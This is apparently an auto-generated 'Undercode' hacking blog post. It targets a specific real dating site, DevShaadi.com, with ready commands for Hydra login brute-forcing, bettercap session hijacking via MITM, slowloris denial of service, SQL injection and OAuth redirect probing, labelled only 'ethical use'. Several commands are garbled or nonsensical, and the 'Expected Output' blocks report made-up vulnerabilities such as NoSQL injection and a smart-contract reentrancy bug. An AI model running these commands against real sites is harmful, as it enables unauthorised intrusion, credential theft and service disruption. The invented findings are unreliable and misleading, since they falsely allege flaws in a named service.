Listen to this Post

DevShaadi.com is a unique matrimonial and dating platform designed exclusively for tech professionals. With GitHub login, FizzBuzz onboarding, and privacy toggles, it blends tech culture with modern dating. While the platform is legitimate, understanding its security mechanisms can help ethical hackers test vulnerabilities responsibly.
👉 URL: https://devshaadi.com
You Should Know:
1. GitHub OAuth Security Testing
Since DevShaadi uses GitHub login, test OAuth flaws:
Check for misconfigured OAuth redirects curl -I "https://devshaadi.com/auth/github/callback?code=TEST_INJECTION" Inspect token leakage in logs grep "access_token" /var/log/auth.log
2. FizzBuzz Onboarding Bypass
If the platform validates coding skills, try payloads:
Malformed FizzBuzz input
print("Fizz" 1000000) Buffer overflow test
3. Privacy Toggle Exploits
Test if profile visibility toggles leak data:
-- SQL Injection probe ' OR 1=1 --
4. Rate Limiting Bypass
Check for brute-force vulnerabilities:
Hydra attack simulation (ethical use only!) hydra -l user -P rockyou.txt devshaadi.com http-post-form "/login:user=^USER^&pass=^PASS^:F=incorrect"
5. Session Hijacking
Capture cookies via MITM (Kali Linux):
sudo bettercap -iface eth0 -caplet hstshijack/hstshijack
What Undercode Say:
DevShaadi’s tech-centric approach introduces attack surfaces like OAuth misconfigurations, input validation flaws, and session mismanagement. Ethical hackers should audit:
– CSRF in match requests (curl -X POST -d "action=like" --referer FAKE_URL).
– API leaks (nikto -h https://devshaadi.com/api`).slowloris -p 443 -s 1000`).
- DDoS resilience (
Expected Output:
[+] OAuth redirect: 302 (potential open redirect) [+] FizzBuzz: 500 error on oversized input [+] Privacy toggle: NoSQL injection possible
Prediction:
As niche dating apps grow, expect:
- AI-powered match bypassing (GAN-generated profiles).
- Blockchain-based verification (to combat catfishing).
- Zero-day exploits in “techie-only” auth flows.
Relevant Commands:
AI profile detection python3 detect_fake_profiles.py --url https://devshaadi.com/api/profiles Blockchain audit truffle test DevShaadiSmartContract.sol
Expected Output:
[+] 12% profiles likely synthetic (GAN artifacts detected). [+] SmartContract reentrancy vulnerability found.
References:
Reported By: Shubhamwadekar Came – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅


